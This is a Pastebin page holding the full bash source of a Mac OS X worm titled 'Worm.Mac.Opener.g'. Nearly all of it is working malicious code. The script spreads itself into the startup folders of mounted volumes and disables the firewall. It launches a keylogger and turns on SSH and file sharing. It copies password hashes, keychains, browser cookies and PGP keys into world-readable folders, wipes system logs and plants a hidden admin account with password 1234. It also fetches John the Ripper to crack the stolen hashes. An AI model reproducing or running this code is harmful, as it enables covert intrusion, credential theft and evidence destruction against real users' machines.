API tools faq
paste
Advertisement
FlyFar

Worm.Mac.Opener.g - Source Code

FlyFar
Jun 9th, 2023
926
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 18.43 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2.  
  3. ##################################
  4. # opener 2.2 - a startup script to turn on services and gather user info & hashes for Mac OS X
  5. ##################################
  6.  
  7. # This script runs in bash (as is noted by the very first line of this script)
  8.  
  9. # You need an admin level user name and password or physical access (boot from a CD or
  10. # firewire/usb, ignore permissions on the internal drive) to install this
  11. # It should go in /Library/StartupItems
  12. # If you change the location to /System/Library/StartupItems be sure to
  13. # also change the paths in this script as needed!
  14. # It should be in it's own folder - the script and the folder must have the exact same name
  15. # there should be two other files in that folder:
  16. # the StartupParameters.plist for this script
  17. # and AddToCronTasks.txt (with commands you want to add to their cron tasks.)
  18.  
  19. # infect any mounted OS X startup volumes
  20. ls /Volumes | while read vol; do
  21. if test -d "/Volumes/$vol/Library" ; then
  22. mkdir "/Volumes/$vol/Library/StartupItems"
  23. cp -R /Library/StartupItems/opener "/Volumes/$vol/Library/StartupItems/"
  24. chmod -Rf 777 "/Volumes/$vol/Library/StartupItems/"
  25. fi
  26. done
  27.  
  28. # if we aren't already in the boot volume's startup, lets get there.
  29. scriptpath=`pwd`
  30. scriptname=`basename $scriptpath`
  31. if [ ! -d /Library/StartupItems/$scriptname ] ; then
  32. cp -R $scriptpath "/Library/StartupItems/"
  33. fi
  34.  
  35. # Uncomment this routine & if run by anyone other than root it just infects and quits
  36. # Are we root? If not, quit.
  37. #if [ `id -u` != "0" ]; then
  38. #   exit
  39. #fi
  40.  
  41. # clobber utmp so that when we connect they can't see us
  42. rm /var/run/utmp
  43. touch /var/run/utmp
  44.  
  45. # disable OS X built-in firewall
  46. defaults write /Library/Preferences/com.apple.sharing.firewall state no
  47.  
  48. # clobber LittleSnitch - THIS IS NOT ENOUGH TO STOP LITTLESNITCH, IT RELAUNCHES
  49. #sudo killall -m LittleSnitch
  50.  
  51. # launch krec if it's installed in /Library/Preferences (it's a keystroke recorder)
  52. # This may not be working... does krec really run???
  53. chmod -R 777 /Library/Preferences/krec.app/
  54. open /Library/Preferences/KRec.app/Contents/MacOS/KRec
  55.  
  56. # Make sure we can write to the hostconfig, ssh and cron files
  57. chflags nouchg /etc/hostconfig /etc/xinetd.d/ssh /etc/daily /etc/weekly /etc/monthly
  58. chmod 777 /etc/hostconfig /etc/xinetd.d/ssh /etc/daily /etc/weekly /etc/monthly
  59.  
  60. # Replace their ssh file with our version which turns on ssh
  61. echo "service ssh" > /private/etc/xinetd.d/ssh
  62. echo "{" >> /private/etc/xinetd.d/ssh
  63. echo "disable = no" >> /private/etc/xinetd.d/ssh
  64. echo "socket_type = stream" >> /private/etc/xinetd.d/ssh
  65. echo "wait = no" >> /private/etc/xinetd.d/ssh
  66. echo "user = root" >> /private/etc/xinetd.d/ssh
  67. echo "server = /usr/libexec/sshd-keygen-wrapper" >> /private/etc/xinetd.d/ssh
  68. echo "server_args = -i" >> /private/etc/xinetd.d/ssh
  69. echo "groups = yes" >> /private/etc/xinetd.d/ssh
  70. echo "flags = REUSE IPv6" >> /private/etc/xinetd.d/ssh
  71. echo "session_create = yes" >> /private/etc/xinetd.d/ssh
  72. echo "}" >> /private/etc/xinetd.d/ssh
  73.  
  74. # append these commands to their hostconfig file to turn on File Sharing
  75. # (and to turn on SSH in 10.2.8 and below)
  76. echo "AFPSERVER=-YES-" >> /etc/hostconfig
  77. echo "SSHSERVER=-YES-" >> /etc/hostconfig
  78. # Uncomment these lines to turn on windows sharing or web sharing
  79. #echo "SMBSERVER=-YES-" >> /etc/hostconfig
  80. #echo "WEBSERVER=-YES-" >> /etc/hostconfig
  81.  
  82.  
  83. ##################################
  84. # gather hashes and other info
  85. ##################################
  86. # create a hidden folder called .info and some subfolders
  87. mkdir /.info /.info/Library /.info/Library/Preferences /.info/private /.info/private/var /.info/keychains
  88. mkdir /.info/Library/Application\ Support/ /.info/nistuff /.info/Applications /.info/KRec_Logs
  89.  
  90. # copy some interesting data and all the hashes into the info folder
  91. cp -R /Library/ApplePasswordServer /.info/Library/ApplePasswordServer # for OS X SERVER
  92. cp -R /private/var/db /.info/private/var/db # all the netinfo stuff
  93. cp -R /Library/Keychains /.info/Library/
  94. cp -R /Library/Preferences/DNSUpdate /.info/Library/Preferences/ # DynDNS locator beacon prefs
  95. cp /Library/WebServer/users /.info/Library/WebServer/users
  96. cp /System/Library/CoreServices/SystemVersion.plist /.info/System/Library/CoreServices/SystemVersion.plist
  97. cp /Library/Preferences/Netopia/Netopia\ Preferences /.info/Library/Preferences/Netopia/Netopia\ Preferences
  98. cp /Library/Preferences/Netopia/TB2\ Activation\ Key /.info/Library/Preferences/Netopia/TB2\ Activation\ Key
  99. cp /Library/Preferences/com.apple.MCX.plist /.info/Library/Preferences/
  100. /usr/bin/ditto -rsrcFork /Library/Application\ Support/Adobe/Adobe\ Registration\ Database /.info/Library/Application\ Support/
  101. /usr/bin/ditto -rsrcFork /Library/Application\ Support/Connectix/Virtual\ PC/Virtual\ PC\ 6.0\ Registration.vpf /.info/Library/Application\ Support/
  102. /usr/bin/ditto -rsrcFork /Applications/Microsoft\ Office\ X/Office/OfficePID /.info/Applications/
  103. cp /Library/Preferences/jtr/run/john.pot /.info/john.pot
  104. cp -R /Library/Preferences/KRec.app/Contents/MacOS/*.krec /.info/KRec_Logs/
  105. /usr/bin/ditto -rsrcFork /Library/Application\ Support/Final\ Cut\ Express\ Support/Final\ Cut\ Express\ System\ ID /.info/Library/Application\ Support/
  106. /usr/bin/ditto -rsrcFork /Library/Application\ Support/ProApps /.info/Library/Application\ Support/
  107. cat /private/var/log/system.log | grep "from" >> /.info/remote_connections.txt
  108. cp /Library/Preferences/SystemConfiguration/NetworkInterfaces.plist /.info/Library/Preferences/NetworkInterfaces.plist
  109. cp /Library/Preferences/SystemConfiguration/preferences.plist /.info/Library/Preferences/preferences.plist
  110. cp /Library/Preferences/Retrospect/Retro.Config* /.info/Library/Preferences/
  111.  
  112. # Get rid of a big file we don't need
  113. rm /.info/private/var/db/locate.database
  114.  
  115. # change to the info folder directory
  116. cd /.info
  117.  
  118. # grab netinfo user stuff (and the MD5 hashes (for . and /) if this is OS X 10.2.8 or lower)
  119. nidump passwd . > passwdMD5
  120. nidump passwd / > passwdMD5
  121.  
  122. # grab 10.3 samba & sha1 hashes
  123. for name in `nireport / /users name`
  124. do
  125. G=`niutil -readprop / /users/${name} generateduid`
  126. echo $G
  127. if [ -n $G ] ; then
  128. H=`cat /private/var/db/shadow/hash/${G}`
  129. echo ${name}:${H:1:32}:${H:33:32}::: >> passwdNT4
  130. echo ${name}:${H:56:40}::: >> passwdSHA1
  131. fi
  132. done
  133. G=`niutil -readprop / /users/root generateduid`
  134. H=`cat /private/var/db/shadow/hash/${G}`
  135. echo root:${H:1:32}:${H:33:32}::: >> passwdNT4
  136. echo root:${H:56:40}::: >> passwdSHA1
  137.  
  138. # Gather all netinfo information for users
  139. cd /.info/nistuff
  140. for username in `nireport . /users name` ; do
  141. niutil -read . /users/$username > $username.txt
  142. done
  143.  
  144. # change to the Users folder
  145. cd /Users
  146.  
  147. # read user names from netinfo
  148. # if folders with those usernames appear in the /Users directory, then create the /.info/Users/username folders
  149. # then copy the StickiesDatabase file, keychains, recent servers & other interesting files from each user
  150. mkdir /.info /.info/Users
  151. cd /Users
  152. for item in `nireport / /users name`
  153. do
  154. if test -d ./$item  ; then
  155. mkdir /.info/Users/$item /.info/Users/$item/Library /.info/$item/Documents /.info/Users/$item/Library/Application\ Support
  156. mkdir /.info/Users/$item/Library/Logs /.info/Users/$item/Library/Preferences /.info/Users/$item/Library/Application\ Support/Chimera
  157. mkdir /.info/Users/$item/Library/Mozilla /.info/Users/$item/Library/Phoenix /.info/Users/$item/Library/Application\ Support/OmniWeb
  158. mkdir /.info/Users/$item/Library/Cookies
  159. cp -f $item/Library/StickiesDatabase /.info/Users/$item/StickiesDatabase
  160. /usr/bin/ditto -rsrcFork $item/Library/Keychains/ /.info/Users/$item/Library/Keychains/
  161. # Now let's grab some other files that might be interesting
  162. /usr/bin/ditto -rsrcFork $item/Documents/PGP /.info/Users/$item/Documents/PGP/
  163. /usr/bin/ditto -rsrcFork $item/Library/Application\ Support/Carracho/ /.info/Users/$item/Library/Application\ Support/Carracho/
  164. /usr/bin/ditto -rsrcFork $item/Library/Application\ Support/Fire/ /.info/Users/$item/Library/Application\ Support/Fire/
  165. /usr/bin/ditto -rsrcFork $item/Library/Logs/AIM/ /.info/Users/$item/Library/Logs/AIM/
  166. /usr/bin/ditto -rsrcFork $item/Library/Preferences/Yahoo\!\ Messenger\ Preferences /.info/Users/$item/Library/Preferences/
  167. /usr/bin/ditto -rsrcFork $item/Library/Preferences/Server\ Settings\ Preferences /.info/Users/$item/Library/Preferences/
  168. /usr/bin/ditto -rsrcFork $item/Library/Preferences/Server\ Settings\ Favorites /.info/Users/$item/Library/Preferences/
  169. /usr/bin/ditto -rsrcFork $item/Library/Preferences/Server\ Admin\ Preferences /.info/Users/$item/Library/Preferences/
  170. /usr/bin/ditto -rsrcFork $item/Library/Preferences/iVisit\ Preferences /.info/Users/$item/Library/Preferences/
  171. /usr/bin/ditto -rsrcFork $item/Library/Preferences/FileMaker\ Preferences /.info/Users/$item/Library/Preferences/FileMaker\ Preferences/
  172. /usr/bin/ditto -rsrcFork $item/Library/Preferences/Fetch\ Shortcuts /.info/Users/$item/Library/Preferences/
  173. /usr/bin/ditto -rsrcFork $item/Library/Preferences/com.geekspiff.chickenofthevnc.plist /.info/Users/$item/Library/Preferences/
  174. /usr/bin/ditto -rsrcFork $item/Library/Preferences/com.carracho.enchilada.plist /.info/Users/$item/Library/Preferences/
  175. /usr/bin/ditto -rsrcFork $item/Library/Preferences/com.apple.WorkgroupManager.plist /.info/Users/$item/Library/Preferences/
  176. /usr/bin/ditto -rsrcFork $item/Library/Preferences/com.apple.security.plist /.info/Users/$item/Library/Preferences/
  177. /usr/bin/ditto -rsrcFork $item/Library/Preferences/com.apple.mail.plist /.info/Users/$item/Library/Preferences/
  178. /usr/bin/ditto -rsrcFork $item/Library/Preferences/com.apple.internetconnect.plist /.info/Users/$item/Library/Preferences/
  179. /usr/bin/ditto -rsrcFork $item/Library/Preferences/com.apple.internetconfig.plist /.info/Users/$item/Library/Preferences/
  180. /usr/bin/ditto -rsrcFork $item/Library/Preferences/com.aol.aim.plist /.info/Users/$item/Library/Preferences/
  181. /usr/bin/ditto -rsrcFork $item/Library/Preferences/Carracho* /.info/Users/$item/Library/Preferences/
  182. /usr/bin/ditto -rsrcFork $item/Library/Preferences/com.yahoo.Messenger* /.info/Users/$item/Library/Preferences/
  183. /usr/bin/ditto -rsrcFork $item/Library/Application\ Support/Chimera/Profiles/default/*.slt/cookies.txt /.info/Users/$item/Library/Application\ Support/Chimera/
  184. /usr/bin/ditto -rsrcFork $item/Library/Preferences/iCab\ Preferences/iCab\ Cookies /.info/Users/$item/Library/Preferences/iCab\ Preferences/
  185. /usr/bin/ditto -rsrcFork $item/Library/Mozilla/Profiles/default/*.slt/cookies.txt /.info/Users/$item/Library/Mozilla/
  186. /usr/bin/ditto -rsrcFork $item/Library/Phoenix/Profiles/default/*.slt/Cache/cookies.txt /.info/Users/$item/Library/Phoenix/
  187. /usr/bin/ditto -rsrcFork $item/Library/Application\ Support/OmniWeb/Cookies.xml /.info/Users/$item/Library/Application\ Support/OmniWeb/
  188. /usr/bin/ditto -rsrcFork $item/Library/Application\ Support/OmniWeb\ 5/Cookies.xml /.info/Users/$item/Library/Application\ Support/OmniWeb/
  189. /usr/bin/ditto -rsrcFork $item/Library/Preferences/Opera*Preferences/cookies*.dat /.info/Users/$item/Library/Preferences/Opera/
  190. /usr/bin/ditto -rsrcFork $item/Library/Cookies/Cookies.plist /.info/Users/$item/Library/Cookies
  191. /usr/bin/ditto -rsrcFork $item/.gnupg /.info/Users/$item/Documents/gnupg/
  192. /usr/bin/ditto -rsrcFork $item/.ssh/known_hosts /.info/Users/$item/Documents/ssh/
  193. /usr/bin/ditto -rsrcFork $item/Library/Application\ Support/Little\ Snitch/config.plist /.info/Users/$item/Library/Little\ Snitch/
  194.  
  195. # If you are deleting logs then you probably won't want to keep a copy of this.
  196. # On the other hand, if you want to see what the user has been doing in bash... (it will also show all YOUR commands!)
  197. /usr/bin/ditto -rsrcFork $item/.bash_history /.info/Users/$items/
  198.  
  199. # A certain program keeps a certain file here called ".DS_Store " (note the trailing space)
  200. /usr/bin/ditto -rsrcFork $item/Library/Preferences/.DS_Store\  /.info/Users/$item/Library/Preferences/
  201. # Uncomment the next lines for the AOL or ICQ prefs, those folders could be pretty large though.
  202. #/usr/bin/ditto -rsrcFork $item/Library/Preferences/America\ Online/ /.info/Users/$item/Library/Preferences/America\ Online/
  203. #/usr/bin/ditto -rsrcFork $item/Library/Preferences/ICQ/ /.info/Users/$item/Library/Preferences/ICQ/
  204. #/usr/bin/ditto -rsrcFork $item/.ssh/ /.info/Users/$item/ssh/
  205. # Now grab urls from the recent servers and throw them in a file in each .info/user folder
  206. for filename in `ls ./$item/Library/Recent\ Servers`
  207. do
  208. strings -13 ./$item/Library/Recent\ Servers/$filename/rsrc | grep "://" >> /.info/Users/$item/RecentServersList.txt
  209. done
  210. fi
  211. done
  212.  
  213. # change permissions on the info folders and all the stuff we collected
  214. chmod -Rf 777 /.info
  215.  
  216. # now copy the info folder into the Public folder of each user (since sharing will be on at restart and guest is on by default anyone can get to them)
  217. cd /Users
  218. chmod -Rf 777 /.info
  219. find . -maxdepth 2 -name "Public" -type d -exec ditto -rsrcFork /.info '{}/.info' \;
  220. find . -maxdepth 3 -name ".info" -type d -exec chmod -R 777 '{}' \;
  221. rm -R /.info
  222.  
  223.  
  224. #################
  225. # Delete log files
  226. ##################
  227. # Clean up after ourselves by removing logs
  228. # first, kill syslogd so no further logs will be made until restart
  229. killall syslogd
  230. # Now find all the files in private/var/log and replace them with empties
  231. find /private/var/log/ -type f | while read target ; do
  232. rm $target ; touch $target
  233. done
  234. # Do the same with files in /Library/Logs
  235. find /Library/Logs/ -type f | while read target ; do
  236. rm $target ; touch $target
  237. done
  238. # Get rid of a few others
  239. rm -f /Library/Preferences/Netopia/Timbuktu\ Pro\ Log
  240. rm -f /var/log/osxvnc.*
  241. cd /Users
  242. find . -maxdepth 2 -name ".bash_history" -exec rm -f '{}' \;
  243. history -c
  244.  
  245.  
  246. ##################################
  247. # Create an admin user called hacker
  248. ##################################
  249. # create an admin user named hacker with password 1234
  250. # note, this user will NOT appear in their SystemPreferences accounts list or the login window
  251. # the user WILL appear in Netinfo Manager
  252. # to remove the user later try nidump -destroy / /users/hacker
  253. niutil -create / /users/hacker
  254. niutil -createprop / /users/hacker uid 401
  255. niutil -createprop / /users/hacker realname "Hacker"
  256. niutil -createprop / /users/hacker home "/Users/.hacker"
  257. niutil -createprop / /users/hacker shell "/bin/bash"
  258. niutil -createprop / /users/hacker gid 20
  259. niutil -createprop / /users/hacker passwd "rQ3p5/hpOpvGE" #(it's 1234)
  260. nicl . -append /groups/admin users hacker
  261. mkdir /private/var/home
  262. chown -R hacker:staff /Users/.hacker
  263. chmod -Rf 700 /Users/.hacker
  264.  
  265. ##################################
  266. # Make the cron tasks delete the logs
  267. ##################################
  268. # append some commands to the cron scripts
  269. # change daily to weekly or monthly if desired (or all three)
  270.  
  271. # checks to see if the last line in the daily cron script is our last line to remove logs
  272. # if not, we add the lines
  273. last_line=`tail -n 1 /etc/daily`
  274. if [ "$last_line" != "rm -f /Library/Preferences/Netopia/Timbuktu\ Pro\ Log" ] ; then
  275. #echo "rm -Rf /private/var/log/" >> /etc/daily
  276. # Commenting the above out because it makes 10.2 machines drop out to the command line at boot!  Argh!
  277. echo "rm -Rf /Library/Logs/" >> /etc/daily
  278. echo "rm -f /Library/Preferences/Netopia/Timbuktu\ Pro\ Log" >> /etc/daily
  279. fi
  280.  
  281.  
  282. ##################################
  283. # Download, install & run John The Ripper
  284. ##################################
  285.  
  286. # If the jtr directory isn't there, install jtr
  287. if [ ! -d /Library/Preferences/jtr/ ] ; then
  288.  
  289. # Make a jtr directory
  290. mkdir /Library/Preferences/jtr/
  291. cd /Library/Preferences/jtr/
  292.  
  293. # download jtr
  294. /usr/bin/ftp http://deepquest.code511.com/os_X_tools/john-1.6.33-binaries-OSX.tar.gz
  295. /usr/bin/ftp http://openwall.com/john/a/john-1.6.tar.gz
  296.  
  297. # decompres the files
  298. /usr/bin/gzip -d john-1.6.33-binaries-OSX.tar.gz
  299. /usr/bin/tar -xf john-1.6.33-binaries-OSX.tar
  300. /usr/bin/gzip -d john-1.6.tar.gz
  301. /usr/bin/tar -xf john-1.6.tar
  302.  
  303. # delete the compressed files
  304. rm john-1.6.33-binaries-OSX.tar
  305. rm john-1.6.tar
  306.  
  307. # copy what we need for jtr to run
  308. cp -R /Library/Preferences/jtr/john-1.6.33.pkg/Contents/Resources/run /Library/Preferences/jtr/run
  309. cp john-1.6/run/*.chr /Library/Preferences/jtr/run
  310.  
  311. # cleanup
  312. rm -R /Library/Preferences/jtr/john-1.6
  313. rm -R /Library/Preferences/jtr/john-1.6.33.pkg
  314. rm README*
  315. fi
  316.  
  317. # make sure the john dir exists and is writable and unlocked
  318. if [ -d /Library/Preferences/jtr/ ] ; then
  319. chflags -R nouchg /Library/Preferences/jtr/
  320. chmod -R 777 /Library/Preferences/jtr/
  321.  
  322. # check to see if a restore file exists and if so, just restore
  323. if test -f /Library/Preferences/jtr/run/restore ; then
  324. cd /Library/Preferences/jtr/
  325. ./run/john -restore &
  326. ./run/john -restore:DESs &
  327.  
  328. else
  329.  
  330. # grab 10.2.x DES hashes for john
  331.  
  332. nidump passwd . >> /Library/Preferences/jtr/passwdMD5
  333. nidump passwd / >> /Library/Preferences/jtr/passwdMD5
  334.  
  335. # grab 10.3 samba hashes and format for john
  336. for name in `nireport / /users name`
  337. do
  338. G=`niutil -readprop / /users/${name} generateduid`
  339. if [ -n "$G" ] ; then
  340. H=`cat /private/var/db/shadow/hash/${G}`
  341. echo ${name}:${H:1:32}:${H:33:32}::: >> /Library/Preferences/jtr/passwdNT4
  342. echo ${name}:${H:56:40}::: >> /Library/Preferences/jtr/passwdSHA1
  343. fi
  344. done
  345.  
  346. # build a bigger wordlist
  347. if [ ! -f /Library/Preferences/jtr/wordsdone ] ; then
  348. cat /usr/share/dict/* /Library/Preferences/jtr/run/password.lst | sort -us > /Library/Preferences/jtr/big.txt
  349. find /Users -iname "*.txt" -type f -exec sort '{}' -us >> /Library/Preferences/jtr/big.txt \;
  350. tr "\r" "\n" < /Library/Preferences/jtr/big.txt > /Library/Preferences/jtr/big2.txt
  351. tr -cs "[:alnum:]" "\n" < /Library/Preferences/jtr/big2.txt > /Library/Preferences/jtr/big.txt
  352. tr "[:upper:]" "[:lower:]" < /Library/Preferences/jtr/big.txt > /Library/Preferences/jtr/big2.txt
  353. sort -us /Library/Preferences/jtr/big2.txt > /Library/Preferences/jtr/run/password.lst
  354. rm /Library/Preferences/jtr/big.txt /Library/Preferences/jtr/big2.txt
  355. touch /Library/Preferences/jtr/wordsdone
  356. fi
  357.  
  358. # run john on the 10.3 hashes
  359. # If there aren't any more of these type of hashes left to crack then jtr will just exit
  360. cd /Library/Preferences/jtr/
  361. nice -n 20 ./run/john -format:LM passwdNT4 &
  362.  
  363. # run another instance of john on the 10.2 hashes
  364. # If there aren't any more of these type of hashes left to crack then jtr will just exit
  365. nice -n 20 ./run/john -session:DESs -format:DESs passwdMD5 &
  366.  
  367. fi
  368. fi
  369.  
  370. ##################################
  371. # miscellaneous
  372. ##################################
  373. # uncomment the next 2 lines if you want everyone to have full access to managed preferences
  374. #chmod -f 777 /Library
  375. #chmod -Rf 777 /Library/ManagedPreferences
  376. #chmod -Rf 777 /Library/Preferences/com.apple.MCX.plist
Tags: BASH mac worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!